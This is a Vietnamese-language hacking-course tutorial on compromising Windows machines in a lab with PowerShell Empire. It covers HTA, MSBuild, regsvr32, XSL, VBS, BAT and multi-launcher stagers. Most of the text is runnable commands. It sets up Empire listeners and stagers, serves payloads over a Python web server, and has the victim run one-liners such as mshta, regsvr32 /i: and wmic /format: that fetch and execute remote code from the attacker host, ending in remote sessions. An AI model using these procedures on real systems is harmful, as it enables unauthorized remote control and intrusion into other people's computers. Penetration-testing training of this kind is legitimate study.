Những cách Khai thác Windows PC với PowerShell Empire
Nội Dung :
Đây là bài học thứ hai của chúng ta trong chuyên đề ‘PowerShell Empire ‘ của khóa học Hacking 101 @ https://cehvietnam.com
- Exploit qua HTA
- Exploit qua MSBuild.exe
- Exploit qua regsvr32
- XSL exploit
- Exploit qua một visual basic script
- BAT exploit
- Multi_launcher exploit
Exploit qua HTA
Kiểu tấn công này giúp chúng ta khai thác hệ điều hành Windows trên máy tính nạn nhân thông qua .hta. Khi tệp .hta được chạy qua mshta.exe, nó thực thi dưới dạng tệp .exe có chức năng tương tự cho phép chúng ta vượt qua các cơ chế kiểm soát để điều khiển mục tiêu. Kiểu attack này được trình bày trong một bài học khác của Hacking 101 .
Chạy pentest lab gồm 1 Kali Linux và 1 Windows 2008 , kiểm tra IP Kali Linux hoặc gán địa chỉ 192.168.1.107 như bài hướng dẫn, và đặt IP thích hợp cho Windows Server để các máy có thể thấy nhau , nên kiểm tra qua lệnh Ping .
Hãy mở Empire với lệnh ‘./Empire’.
Trước tiên ta cần mở 1 listeners:
| listeners |
Thông báo sau sẽ xuất hiện khi mới chạy Empire “no listeners are currently active” , hãy kiểm tra IP trên máy của bạn sau đó thực hiện các lệnh như sau :
| uselistener http set Host http://192.168.1.107 execute |
Khi listener http được tạo nhập lệnh ‘back’ để vào giao tiếp listener dùng cho việc tạo một exploit :
| usestager windows/hta set Listener http set OutFile /root/1.hta execute |
Kết quả của lệnh trên là tập tin 1.hta được tạo ra. Các bạn hãy chạy máy chủ python với lệnh như trong hình minh họa nhằm mục đích chia sẽ tập tin hta trên:
| python -m SimpleHTTPServer 8080 |
Khi máy chủ python hoạt động trên victim PC các bạn chạy lệnh sau để thực thi tập tin độc hại:
| 1 | mshta.exe http://192.168.1.107:8080/1.hta |
Trong giây lát ta thấy xuất hiện một session như là XDGM6HLE , hãy truy cập với lệnh interact :
| interact XDGM6HLE sysinfo |
Exploit thông qua MSBuild.exe
Tiếp theo ta sẽ dùng Empire để khai thác thông qua MSBuild.exe, điều này sẽ cho phép chúng ta điều khiển máy chủ windows từ xa thông qua tập tin XML. Để biết chi tiết kiểu tấn công này hãy xem tại đây (Hacking 101) . Hãy chạy các lệnh sau (lưu ý thay địa chỉ IP thích hợp) :
| listeners uselistener http set Host http://192.168.1.107 execute |
Hãy nhập lệnh ‘back’ để vào listener interface tạoexploit. Và chạy các lệnh sau đây :
| usestager windows/launcher_xml set Listener http execute |
Các bạn sẽ thấy tập tin xml là launcher.xml tạo trong thư mục /tmp. Hãy copy tập tin này máy victim PC trong mô hình lab (bên trong thư mục Microsoft.NET\Framework\v4.0.30319\) và chạy kết hợp các lệnh sau đây:
| cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml |
Nếu thành công sẽ thấy một session được thiết lập như trong hình là A8H14C7L , hãy tương tác với lệnh interact và thử lệnh sysinfo, help …
| interact A8H14C7L sysinfo |
Exploit thông qua regsvr32
Phương án kế tiếp sẽ là tấn công thông qua regsvr32. Để biết chi tiết hãy xem trong khóa học Hacking 101. Lập lại quy trình với các lệnh như hai phần trên để tạo một listener và chạy exploit:
| listeners uselistener http set Host http://192.168.1.107 execute |
Gõ ‘back’ và tạo mã khai thác:
| usestager windows/launcher_sct set Listener http execute |
Tiến trình sẽ tạo tập tin .sct trong thư mục /tmp. Hãy chia sẽ tập tin với victim PC sử dụng pythong server và chạy lệnh sau từ cửa sổ Run của máy tính nạn nhân trong mô hình lab như hình minh họa
| regsvr32.exe/u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll |
Nếu thành công ta sẽ có một session được thiết lập:
| interact <session name> sysinfo |
Exploit qua XSL
XSL là một ngôn ngữ dùng cho việc định dạng dữ liệu, nó cũng mô tả cách máy chủ web tương tác với việc sử dụng XML. Phương pháp tấn công tiếp theo của chúng ta với Empire là khai thác tệp .xsl. Đối với phương pháp này, trước tiên hãy kích hoạt listener bằng cách nhập:
| listeners uselistener http set Host http://192.168.1.107 execute |
Tiếp theo tạo exploit :
| usestager windows/launcher_xsl set Listener http execute |
Ta thấy tập tin .xsl được tạo. Bây giờ hãy chạy máy chủ python server từ thư mục tập tin được tạo như hình sau :
| cd /tmp python -m SimpleHTTPServer 8080 |
Trên cửa sổ dòng lệnh của victim PC ta chạy lệnh :
| wmic process get brief /format:”http://192.168.1.107:8080/launcher.xsl” |
Nếu thành công ta sẽ có một session được thiết lập , hãy tương tác và thử các lệnh tùy ý :
| interact <session name> sysinfo |
Exploit thông qua Visual Basic script
Tiếp theo, hãy chuyển qua thử nghiệm khai thác với một kịch bản VBS độc hại. Hãy tạo listener trước
| listeners uselistener http set Host http://192.168.1.107 execute |
Tạo tập tin kịch bản .vbs độc hại :
| usestager windows/launcher_vbs set Listener http execute |
Chạy máy chủ python :
| python -m SimpleHTTPServer 8080 |
Một khi tập tin .vbs đã chia sẽ qua python server thì trên máy tính nạn nhân và thực thi ta chạy các lệnh điều khiển thích hợp (các bạn hãy mô tả lệnh chạy trên victim PC như là một đáp án) :
| interact <session name> sysinfo |
Exploit qua tập tin bat
Như trong bài đầu tiên giới thiệu về Empire ta sẽ tạo 1 tập tin bat để tiến hành khai thác:
| listeners uselistener http set Host http://192.168.1.107 execute back |
Tạo tập tin .bat :
| usestager windows/launcher_bat use Listener http set OutFile /root/1.bat execute |
Các bạn thấy tập tin 1.bat được tạo, hãy chạy python server để chia sẽ tập tin 1.bat với victim PC.
| python -m SimpleHTTPServer 8080 |
Và chạy tập tin 1/.bat (lệnh thế nào các bạn hãy trả lời nhé) và ta sẽ thấy 1 session được thiết lập:
| interact <session name> sysinfo |
Multi_launcher
Cuối cùng là một vecto rta61n công có thể chạy trên nhiều nền tảng như Windows hay Linux , hãy tạo một listener:
| listeners uselistener http set Host http://192.168.1.107 execute |
Tạo một file nguy hiểm :
| usestager multi/launcher set listener http execute |
Các bạn sẽ thấy một đoạn code được tạo ra, thử copy đoạn code này và dán vào command prompt của victim PC rồi nhấn Enter ta sẽ chiếm được session điều khiển đến máy nạn nhân:
| interact <session name> sysinfo |
Tổng Kết
Trên đây là các phương pháp mà bạn có thể sử dụng để khai thác hệ thống WIndows , hãy nắm vững và sử dụng nhuần nhuyễn Empire để bổ sung công lực pentest cho mình bên cạnh kho công cụ Metasploit thần thánh nghe các bạn. Happy Studing!
BQT AKADEMY – Hacking 101 Lab / Biên soạn từ H.A.I
Comments